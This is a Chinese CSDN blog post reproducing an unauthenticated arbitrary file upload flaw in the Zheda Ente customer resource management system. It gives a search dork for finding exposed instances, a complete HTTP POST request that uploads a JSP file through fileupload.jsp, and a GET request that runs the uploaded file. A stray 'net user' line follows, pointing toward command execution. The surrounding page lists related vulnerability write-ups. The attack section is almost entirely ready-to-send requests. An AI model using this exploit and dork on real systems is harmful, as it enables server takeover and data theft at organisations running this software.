【漏洞复现】浙大恩特客户资源管理系统文件上传漏洞

已于 2023-11-10 15:30:36 修改
阅读量328 收藏
点赞数 6
分类专栏: 漏洞复现 文章标签: 网络安全 学习 web安全 安全
于 2023-11-10 15:28:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60614981/article/details/134333596
版权

漏洞描述

浙大恩特客户资源管理系统中的fileupload.jsp接口存在安全漏洞,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。

搜索语法

title="欢迎使用浙大恩特客户资源管理系统"

漏洞详情

上传命名为ovo.jsp的文件,内容为输出qaq

POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=ovo.jsp  HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31


<% out.println("qaq"); %>

返回文件上传路径
在这里插入图片描述

访问路径

GET /enterdoc/uploadfile/ovo.jsp  HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

返回内容
在这里插入图片描述

net user
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
浙大恩特客户资源管理系统任意文件上传漏洞复现
0xSec
11-10 1515
浙大恩特客户资源管理系统中fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。
浙大恩特客户资源管理系统 SQL注入漏洞复现
0xSec
11-17 791
浙大恩特客户资源管理系统中T0140_editAction.entweb接口处存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息,深入利用可获取服务器权限。
漏洞复现浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传漏洞
做自己喜欢的事,并将其发挥到极致!
11-15 838
杭州恩软信息技术有限公司(简称浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司,该系统旨在帮助企业高效管理客户关系,提升销售业绩,促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示,帮助企业深度挖掘客户数据,提供决策参考。
漏洞复现浙大恩特客户资源管理系统 CompInfoAction存在SQL注入漏洞
https://blog.echo234.cn/
03-30 272
浙大恩特客户资源管理系统是一款专为外向型企业设计的先进管理工具。该系统以客户需求为导向,通过整合企业内外部资源,实现客户信息的全面管理和深度分析。该系统还具有强大的数据分析和挖掘功能,可以帮助企业深入挖掘客户需求,制定针对性的销售策略,提升客户满意度和忠诚度。同时,系统还支持自定义配置和扩展,可以根据企业的实际需求进行灵活调整,满足企业的个性化管理需求。总之,浙大恩特客户资源管理系统是一款高效、实用的管理工具,能够帮助企业更好地管理客户资源,提升销售业绩和客户满意度,是企业信息化建设的得力助手。浙大恩特客户
漏洞复现浙大恩特客户资源管理系统-FollowAction-sql注入
知黑而守白
02-19 238
杭州恩软信息技术有限公司(浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司,隶属浙江大学国家大学科技园,立足于中国外向型企业的管理软件系统的设计,研发和咨询服务。浙大恩特客户资源管理系统 FollowAction 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现浙大恩特客户资源管理系统Ri0004_openFileByStream.jsp接口存在任意文件读取漏洞
失心少年
04-18 49
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。漏洞链接:http://127.0.0.1/entsoft/module/i0004_openFileByStream.jsp;
浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-14 306
浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。浙大恩特客户资源管理系统中的fileupload.jsp接口存在安全漏洞,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。
漏洞复现浙大恩特客户资源管理系统-crmbasicaction-任意文件上传
知黑而守白
01-09 486
杭州恩软信息技术有限公司(浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司,隶属浙江大学国家大学科技园,立足于中国外向型企业的管理软件系统的设计,研发和咨询服务。浙大恩特客户资源管理系统 CrmBasicAction接口权限设置不当,攻击者可以通过利用此漏洞,上传恶意文件到系统中,可能导致未授权访问、敏感信息泄露或系统完整性受损等严重后果。
复现浙大恩特客户资源管理系统 SQL注入漏洞_71
fushuang333的博客
04-11 382
复现浙大恩特客户资源管理系统 SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
浙大恩特外贸客户管理系统使用手册
11-10
浙大恩特外贸客户管理系统,浙大恩特外贸客户管理系统使用手册
恩特软件操作流程样本.doc
12-18
恩特软件操作流程样本.doc 恩特软件操作流程样本是一种外贸软件顾客手册,旨在指导用户快速...该手册涵盖了登入系统、帐号管理、基本设立、邮箱设立和客户跟进等模块,旨在帮助用户快速上手恩特软件,提高工作效率。
Ent animated character 恩特动画角色 游戏树怪模型带动画资源包unitypackage项目
04-15
Ent animated character 恩特动画角色 游戏树怪模型带动画资源包unitypackage项目 支持Unity版本2019.2.18或更高 动画 走 闲置的 空闲时间长 空闲_长_2 攻击 损害 死亡 纹理 512x512 多边形 3093
软件企业市场营销策略研究—以浙大恩特网络科技有限公司为例.doc
11-25
软件企业市场营销策略研究—以浙大恩特网络科技有限公司为例.doc
恩特雷加
02-21
"恩特雷加"可能是指一个与C++编程相关的项目或...在这个目录下,可能会包含源代码、构建脚本、测试文件、README文档以及其他辅助资源。为了深入了解"恩特雷加"项目,你需要查看这些文件内容,了解其具体的实现和目标。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Lumos学习王佩丰Excel第四讲:排序与选择
最新发布
Sunshine_XX的博客
07-10 275
自定义排序演示:工资条拆分的演示:如果遇到很长的表,标题只存在于顶端,打印出来观感不好,可以这样做:有些版本的excel复制筛选数据容易把背后隐藏的所有数据都复制上去,这时可选中定位条件的“可见单元格”选项,复制粘贴即可。并排表示且,错排表示或。ctrl+shift+↓+→全选,演示说明:回头学原理,先记住一句话,要想筛选对,条件表头不要对。
Autoware.universe 高效学习第三章 -- 智驾技术务虚会之智驾技术栈讨论 其一
cy1641395022的博客
07-10 668
Autoware.universe 高效学习第三章 -- 智驾技术务虚会之智驾技术栈讨论 其一
jmeter-beanshell学习5-beanshell加减乘除运算
朱文宇的博客
07-08 305
jmeter使用beanshell,jmeter beanshell脚本编写,beanshell进行加减乘除运算
恩特软件操作流程.doc
04-25
恩特软件操作流程.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值